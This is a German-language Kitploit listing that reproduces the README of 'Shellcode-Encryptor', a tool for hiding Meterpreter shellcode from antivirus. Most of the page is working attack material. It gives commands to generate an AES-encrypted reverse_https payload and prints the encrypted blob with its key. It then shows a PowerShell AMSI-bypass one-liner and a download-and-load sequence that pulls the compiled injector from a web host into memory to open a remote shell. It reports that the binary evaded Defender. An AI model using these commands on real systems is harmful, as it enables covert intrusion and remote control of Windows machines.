Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Shellcode-Encryptor — Ein einfacher Shellcode-Verschlüsseler/Entschlüsseler/Ausführer, um Antivirensoftware zu umgehen. | Kitploit
Tools/GitHubGitHub/plackyhacker/shellcode-encryptor
Verschlüsselungs-/EntschlüsselungstoolsExploit-FrameworksPayload-GenerierungShellcodePayload-Entwicklung
GitHubplackyhacker/shellcode-encryptor

Shellcode-Encryptor

Ein einfacher Shellcode-Verschlüsseler/Entschlüsseler/Ausführer, um Antivirensoftware zu umgehen.

Repository anzeigen
46883vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ShellcodeEncryptor

Ein einfacher Shellcode-Verschlüsseler/Entschlüsseler/Ausführer, um Antivirensoftware zu umgehen.

Hinweis: Ich habe den Arbeitsablauf für die Erstellung des Bypasses komplett überarbeitet. Ich habe festgestellt, dass das Einspritzen des Binärs in den Speicher mithilfe von PowerShell die effektivste Methode ist.

Demo

Zweck

Erzeugen einer .Net-Binärdatei, die base64-kodierten, AES-verschlüsselten Shellcode enthält, der auf einem Windows-Ziel ausgeführt wird, um Antivirensoftware zu umgehen.

Anleitung

Verwende meterpreter_encryptor.py, um den verschlüsselten base64-Shellcode zu erstellen:

root@kitploit:~
root@kali:~# ./meterpreter_encryptor.py -p windows/x64/meterpreter/reverse_https -i 192.168.1.228 -l 443 -f b64
[+] Generiere MSFVENOM-Payload...
[-] Keine Plattform ausgewählt, wähle Msf::Module::Platform::Windows aus dem Payload
[-] Keine Architektur ausgewählt, wähle Architektur: x64 aus dem Payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor_dynamic
x64/xor_dynamic succeeded with size 667 (iteration=0)
x64/xor_dynamic chosen with final size 667
Payload size: 667 bytes
Saved as: ./msf.bin
[+] Verschlüssele den Payload, Schlüssel=fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec...
[+] Base64-Ausgabe:
sZkMiiTitR5hQL2YXTBgjq91qq0FuEqgfR7YiKt2N1IZ8vqW3q/BrIYTjBb7nKLXCsJM25sRqh+R9WHGNsTV8webqwx7ZfAYSvlmEmzIJcKaBVdJO+Lbr7h9RomrOdyaPUAZ6P49lnsZFF1fdvnFOg/WvSdKUrx/eKEt5sNBn/Jz43y26mDEwEEqseydPQHyBcT9Av/ZkTQC6GZU8D+pQhKvXNdnlGrHJk4+G25me/Hzr0P1YuX9ZpGbyXb/pLdmdViAGAPtA/OORVt6xmij4AY24j8SLocUs2A6lSJZHYD2C1+DIc1Lyw8UJ6dtNIU2xDtsHCWX0OlkcjU+QoYpCavs78Y+OePjyBwkryWTzMyuKBgAREjbQQdsIn6dQZeqk/tKI/l6Fmhu27V+wFX7mxUP/KXWf9PI/3QYiuLmkJCWFBL9sINPbLVLePFSke8Ik3t+vp5SIcM+wMufg+TXBdUNpE//gTgCpblXdJfkkqVpMFBxnfX2vYPDcFLWteiNsnHCn9REbVB3MqJe5T55tO/CLq1KkZ2R7Z7rra6H8OhJgOLKEdJ/XHdZV9IFatAtRW2dxVo49P2YFmux2WSDiKhVRoCuLMVM6PeTuzsN+2qV4Zrq6tRAVLwmmTn5uflWER1aScePh6+6utXW/0jS+Hz7KiGP2//8+YDwzYbkLJnfn9B4AdmE4BuNTJRrv7tumsxboNkmWOx87lVElzn5ZM9OP721s8LiSyfkD1zm4o9j2u80syPeEU3PXvOU1epBTsTjdwRWlAYF+wzv3olAjPzR/xojjB602MIUNeCPn4fqDp6NjEokELcgawbWNl1vKYo4QEYgtlhVmqIkk2ooz527AEQb5EWQhkaZEWr4AAmGO1YfvYDCTcfUwV9p/jkg

Nimm den Schlüssel und den Shellcode und füge sie in ProcessInjector.cs ein:

root@kitploit:~
// den base64-Payload entschlüsseln
string payload = "sZkMii [usw.]";
string key = "fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec";

Kompiliere den C#-Code in eine ausführbare Datei (z. B. metInject.exe) und stelle sie über einen Webserver bereit.

Spritze die ausführbare Datei in einen entfernten PowerShell-Prozess ein:

root@kitploit:~
# AMSI-Bypass
$a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iutils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*itFailed") {$f = $e}};$f.SetValue($null,$true)

$bytes = (Invoke-WebRequest "http://192.168.1.228/metInject.exe").Content;
$assembly = [System.Reflection.Assembly]::Load($bytes);
$entryPointMethod = $assembly.GetType('ProcessInjection.Program', [Reflection.BindingFlags] 'Public, NonPublic').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic');
$entryPointMethod.Invoke($null, (, [string[]] ('', '')));

Hoffentlich erhältst du eine schöne Meterpreter-Shell.

Hilfe

root@kitploit:~
./meterpreter_encryptor.py -h                                                                     
usage: meterpreter_encryptor.py [-h] [-l LPORT] [-i LHOST] [-p PAYLOAD] [-m METHOD] [-k KEY] [-e ENCODER] [-f FORMAT]

optional arguments:
  -h, --help            show this help message and exit
  -l LPORT, --lport LPORT
                        The local port that msfconsole is listening on.
  -i LHOST, --lhost LHOST
                        The local host that msfconsole is listening on.
  -p PAYLOAD, --payload PAYLOAD
                        The payload to generate in msfvenom.
  -m METHOD, --method METHOD
                        The method to use: thread/delegate.
  -k KEY, --key KEY     The encryption key (32 chars).
  -e ENCODER, --encoder ENCODER
                        The meterpreter encoder.
  -f FORMAT, --format FORMAT
                        The format to output.

AV-Scan-Ergebnisse

Die Binärdatei wurde am 03.10.2021 mit antiscan.me gescannt.

AV Scan

Hinweise

Getestet mit windows/x64/meterpreter/reverse_https auf Windows 10 Pro (Build 10.0.19042) mit Defender.

Tool herunterladen